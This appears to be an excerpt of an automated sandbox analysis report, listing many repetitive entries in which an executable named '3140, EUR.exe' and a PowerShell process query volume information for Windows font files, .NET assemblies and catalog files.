Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
